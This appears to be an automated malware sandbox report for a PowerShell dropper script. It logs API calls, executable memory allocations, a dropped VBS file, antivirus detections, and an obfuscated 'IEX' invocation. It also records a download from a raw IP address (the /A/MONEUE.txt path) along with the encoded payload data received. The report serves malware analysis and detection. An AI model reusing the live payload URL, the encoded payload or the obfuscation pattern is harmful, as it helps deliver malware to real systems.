Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Nov. 9, 2021, 2:01 p.m.	Nov. 9, 2021, 2:03 p.m.

Size	2.6KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`86d95bf7851b34a2eddf0cb4fc6c8988`
SHA256	`7a9be82adb77cda9dc5e8d44384cf0c1e0739cbf4b19bae509f8fa8eb65e74b6`
CRC32	`FCEA0C82`
ssdeep	`48:yQsK1kKB5zqRsK1kKB5BqkVmxsJDIZMZ00DH138XlQCoVh+t9a7n/0nCME:EK1D5zjK1D5BaxmIZMZLpjxiE7nhME`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\nncncd.txt.ps1
2320

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
179.61.237.75	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW Nov. 9, 2021, 2:01 p.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (9 events)

Time & API	Arguments	Status	Return
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: Mode LastWriteTime Length Name console_handle: 0x0000001b	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: d---- 2021-11-09 오후 2:01 XXX console_handle: 0x00000023	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: Invoke-Expression : Unexpected token '(' in expression or statement. console_handle: 0x00000023	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: At line:5 char:2 console_handle: 0x0000002f	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: + & <<<< ('I'+'EX') $HxBBB console_handle: 0x0000003b	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: + CategoryInfo : ParserError: ((:String) [Invoke-Expression], Par console_handle: 0x00000047	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: seException console_handle: 0x00000053	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: + FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.In console_handle: 0x0000005f	1	1
WriteConsoleW Nov. 9, 2021, 2:01 p.m.	buffer: vokeExpressionCommand console_handle: 0x0000006b	1	1

Uses Windows APIs to generate a cryptographic key (11 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae2c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 9, 2021, 2:01 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ae380 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 9, 2021, 2:01 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://179.61.237.75/A/MONEUE.txt

Performs some HTTP requests (1 event)

request

GET http://179.61.237.75/A/MONEUE.txt

Allocates read-write-execute memory (usually to unpack itself) (36 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01efb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f0f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05431000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05433000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05281000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05434000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05435000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05440000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05436000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f09000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05437000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05441000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02602000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05296000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05297000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05298000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 1900544 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x08840000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x089d6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05438000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05439000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 9, 2021, 2:01 p.m.	process_identifier: 2320 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02603000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\ProgramData\XXX\XXX.vbs

File has been identified by 3 AntiVirus engines on VirusTotal as malicious (3 events)

Avast	VBS:Dropper-TF [Trj]
Microsoft	Trojan:Script/Wacatac.B!ml
AVG	VBS:Dropper-TF [Trj]

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 9, 2021, 2:01 p.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	#36F8C#####A1C2D#326DE#A#A2BFB#7288A#####ADC#62A#A#11######2##15##152A###7########1B3##5##84######24####11#27B29#####41D2D#926#92889#####A2B#3#D2BF57391#####A1C2D1226#27B29#####46F92#####A1D2D#6262B3A#C2BEC#B2BF8#812#612#12893#####A13#412#42894#####A12#12893#####A13#512#52895#####A2852#####A2896#####A11#66F97#####A12#12898#####A2DC3#86F99#####A#ADE#7#9288A#####ADC#62A#11######2##15##667B###7########133##2##1F######25####11#27B29#####46F9A#####A162C#E26#27B29#####46F9B#####A#72A#B2BF####33##9##11##############7E9C#####A192D#2262A8#49#####42BF8#######33##4###5#1############14FE#698#####6739D#####A289E#####A289F#####A14FE#697#####673A######A6FA1#####A289F#####A14FE#6A3#####673A2#####A6FA3#####A73A4#####A192D3#267359#####A162C2E2673A5#####A182D2C26738B#####A8#32#####428A6#####A28A7#####A286B#####62D1C2B158#4A#####42BCA8#2A#####42BCC8#2C#####42BCE286F#####62872#####62873#####62874#####6286######62869#####6286A#####62861#####62877#####6287A#####62875#####62876#####62878#####62879#####6287B#####6287C#####62862#####62864#####67E37#####42C#A2867#####62866#####6289D#####6285F#####6288A#####62A#######33##4##7F##############2885#####61A2D7#267E43#####414FE#6A4#####673BD#1###66F6B#1###67E43#####414FE#6A5#####673B5#1###66F6F#1###67E43#####414FE#6A6#####673C9#1###66F79#1###67E43#####414FE#6A7#####673C1#1###66F6D#1###67E43#####414FE#6AA#####673AA#1###66F71#1###62A8#43#####42B8A##133##3##C3######26####11287F#####616399A######26287E#####6163998######2628C5#####61A3A96######267E79#####4288######68#7D#####47E7D#####42#A32#D#1E28FF#####628A8#####A2831#1###66FA9#####A28A8#####A8#7E#####47E7D#####42881#####68#7A#####428AA#####A6FAB#####A6FAC#####A1BFE#28#7C#####47E79#####42819#1###6#A12##7B69#####48#7F#####412##7B6A#####48#8######42A8#79#####4385DFFFFFF8#7B#####4385FFFFFFF8#81#####43861FFFFFF##1B3##4##73######27####112#522#D#1E28FF#####628B5#####67E32#####46F92#####A182D#3262B3A#B2BFB12#12893#####A1A2D2A262#722#D#1E28FF#####612##2894#####A12##2895#####A2852#####A28AD#####A28B5#####62B#3#A2BD412#12898#####A2DC#DE#E12#1FE1612####1B6F63#####ADC2A#A#11######2###F##5564###E########1B3##3##2A#1####28####117E7D#####42#622#D#1E28FF#####628A8#####A1D2D#B26#628AE#####A2D#62B#3#A2BF32A#628AF#####A172D1326#7282B#1###6182D#C26#813#91613#82B2E#B2BEB#C2BF211#911#89A2852#####A13#47E2A#####411#47948#####17148#####16F5A#####A11#8175813#811#811#98EB732D#7359#####A#D7E2C#####46FB######A13#A2B2912#A28B1#####A13#57E2A#####412#528B2#####A6F6######A2D#D#912#528B2#####A6F5A#####A12#A28B3#####A2DCEDE#E12#AFE1616####1B6F63#####ADC#96FB4#####A13#B2B1612#B28B5#####A13#67E2C#####411#66FB6#####A2612#B28B7#####A2DE1DE3#12#BFE1618####1B6F63#####ADCDE2#25284C#####A13#711#72#142#D#1E28FF#####628B4#####62861#####ADE##2A1717#128#####2##7E##42C####E#########2##CE##2BF9###E############26##E3#9#12#46#####11B3##3##96######29####117E7D#####42#622#D#1E28FF#####628A8#####A192D#3262B#3#A2B##7358#####A1D2D#B26#2172D#9261613#52B28#C2BF313#62BF411#611#58F48#####17148#####1#D#8#98C48#####16F5B#####A11#5175813#511#511#68EB732D7#86F65#####A282A#1###6#B#6#728B8#####ADE2#25284C#####A13#411#42##C2#D#1E28FF#####628B4#####62861#####ADE##2A2A###11#########1D##5875##2#46#####11B3##5##AB#1####2A####117E7D#####42#242#D#1E28FF#####628A8#####A172D#B26#628AE#####A2D#62B#3#A2BF32A#628AF#####A1E2D2C26#7282B#1###61E2D2526#9169A7932#####17132#####1182D17267E38#####4#828B9#####A162F2D2B#9#B2BD2#D2BD9#C2BE7#88#38#####4#9179A74#A####1B8#37#####47E37#####4286##1###68#36#####418#98EB7175913#713#438EA##
Data received	#60#43#36#60#31#45#36#31#32#43#34#60#42#35#32#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#33#31#31#33#44#35#60#42#35#39#60#31#38#38#33#34#60#31#60#60#60#60#60#60#39#31#31#38#35#42#60#41#60#39#60#31#35#42#60#31#60#60#60#60#60#60#60#60#60#33#60#60#38#36#31#38#34#46#60#60#37#60#60#33#35#42#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#34#46#31#33#44#45#60#42#35#44#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#45#36#31#32#45#37#60#42#36#31#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#33#31#31#33#46#36#60#42#36#37#60#31#39#60#33#34#60#31#60#60#60#60#60#60#39#31#31#38#35#42#60#41#60#39#60#31#36#39#60#31#60#60#60#60#60#60#60#60#60#33#60#60#38#36#31#38#34#46#60#60#37#60#60#33#36#39#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#34#46#31#33#46#46#60#42#36#42#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#45#36#31#32#60#36#60#43#36#45#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#33#31#31#33#38#34#60#42#37#33#60#31#39#38#33#34#60#31#60#60#60#60#60#60#39#31#31#38#35#42#60#41#60#39#60#31#37#34#60#31#60#60#60#60#60#60#60#60#60#33#60#60#38#36#31#38#34#46#60#60#37#60#60#33#37#34#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#34#46#31#33#38#38#60#33#37#36#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#45#36#31#32#37#36#60#33#37#37#60#31#60#60#60#60#60#60#60#60#60#33#60#60#43#36#60#31#33#31#31#33#38#31#60#33#37#41#60#31#41#60#33#34#60#31#60#60#60#60#60#60#39#31#31#38#35#42#60#41#60#39#60#31#37#42#60#31#41#38#33#34#60#31#60#60#60#38#60#60#39#33#60#60#34#39#33#32#60#39#60#31#37#42#60#31#42#38#33#35#60#31#60#60#60#38#60#60#38#36#31#38#34#46#60#60#33#37#60#60#37#42#60#31#43#38#33#35#60#31#60#60#60#38#60#60#39#31#31#38#35#42#60#41#60#39#60#31#37#42#60#31#43#43#33#35#60#31#60#60#60#38#60#60#39#33#60#60#35#37#33#32#35#34#60#32#37#42#60#31#45#60#33#35#60#31#60#60#60#38#60#60#39#33#60#60#36#42#33#32#31#34#60#31#37#43#60#31#46#34#33#35#60#31#60#60#60#38#60#60#39#33#60#60#37#46#33#32#31#39#60#43#37#43#60#31#60#34#33#36#60#31#60#60#60#38#60#60#39#33#60#60#42#32#33#32#32#34#60#43#37#43#60#31#31#38#33#36#60#31#60#60#60#38#60#60#39#33#60#60#45#43#33#32#33#32#60#43#37#44#60#31#32#43#33#36#60#31#60#60#60#38#60#60#38#36#31#38#34#46#60#60#33#37#60#60#37#45#60#31#33#43#33#36#60#31#60#60#60#38#60#60#39#31#31#38#35#42#60#41#60#39#60#31#37#45#60#31#43#60#33#36#60#31#60#60#60#38#60#60#39#33#60#60#32#31#33#33#31#34#60#31#37#45#60#31#44#34#33#36#60#31#60#60#60#38#60#60#39#33#60#60#33#35#33#33#34#60#60#43#37#45#60#31#45#34#33#36#60#31#60#60#60#38#60#60#39#33#60#60#34#39#33#33#60#39#60#31#37#45#60#31#46#34#33#36#60#31#60#60#60#38#60#60#39#33#60#60#35#44#33#33#41#32#60#34#37#45#60#31#60#38#33#37#60#31#60#60#60#38#60#60#39#33#60#60#37#31#33#33#42#36#60#38#37#45#60#31#31#43#33#37#60#31#60#60#60#38#60#60#39#33#60#60#38#35#33#33#45#31#60#41#37#45#60#31#33#60#33#37#60#31#60#60#60#38#60#60#39#31#60#60#43#35#33#33#60#39#60#31#37#45#60#31#34#43#37#34#60#31#60#60#60#38#60#60#39#33#60#60#60#34#33#34#39#43#60#43#37#45#60#31#43#34#37#34#60#31#60#60#60#38#60#60#39#31#60#60#34#36#33#34#44#32#60#43#37#46#60#31#32#34#37#35#60#31#60#60#60#38#60#60#38#36#31#38#34#46#60#60#33#37#60#60#38#31#60#31#35#60#37#35#60#31#60#60#60#38#60#60#39#33#60#60#41#36#33#34#60#39#60#31#38#31#60#31#37#60#37#35#60#31#60#60#60#38#60#60#39#31#31#38#35#42#60#41#60#39#60#31#38#31#60#31#39#38#37#35#60#31#60#60#60#38#60#60#39#33#60#60#42#34#33#34#41#32#60#34#38#31#60#31#41#43#37#35#60#31#60#60#60#38#60#60#39#33#60#60#43#37#33#34#
Data received	37#35#60#39#38#31#60#31#43#34#37#35#60#31#60#60#60#38#60#60#39#33#60#60#44#41#33#34#42#36#60#38#38#31#60#31#44#38#37#35#60#31#60#60#60#38#60#60#39#33#60#60#45#44#33#34#37#42#60#39#38#31#60#31#46#60#37#35#60#31#60#60#60#38#60#60#39#33#60#60#60#60#33#35#38#31#60#39#38#31#60#31#60#34#37#36#60#31#60#60#60#38#60#60#39#33#60#60#31#33#33#35#38#36#60#39#38#31#60#31#31#43#37#36#60#31#60#60#60#38#60#60#39#33#60#60#32#36#33#35#42#36#60#38#38#32#60#31#33#60#37#36#60#31#60#60#60#38#60#60#39#33#60#60#33#39#33#35#45#33#60#39#38#32#60#31#34#38#37#36#60#31#60#60#60#38#60#60#39#33#60#60#35#33#33#35#36#31#60#36#38#32#60#31#35#43#37#36#60#31#60#60#60#38#60#60#39#33#60#60#36#36#33#35#42#36#60#38#38#32#60#31#37#60#37#36#60#31#60#60#60#38#60#60#39#33#60#60#37#39#33#35#36#31#60#36#38#32#60#31#38#34#37#36#60#31#60#60#60#38#60#60#39#33#60#60#38#43#33#35#45#43#60#43#38#32#60#31#39#43#37#36#60#31#60#60#60#38#60#60#39#33#60

Poweshell is sending data to a remote host (1 event)

Data sent

GET /A/MONEUE.txt HTTP/1.1 Host: 179.61.237.75 Connection: Keep-Alive

Communicates with host for which no DNS query was performed (1 event)

host

179.61.237.75

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
send Nov. 9, 2021, 2:01 p.m.	buffer: GET /A/MONEUE.txt HTTP/1.1 Host: 179.61.237.75 Connection: Keep-Alive socket: 1400 sent: 75	1	75	0

nncncd.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All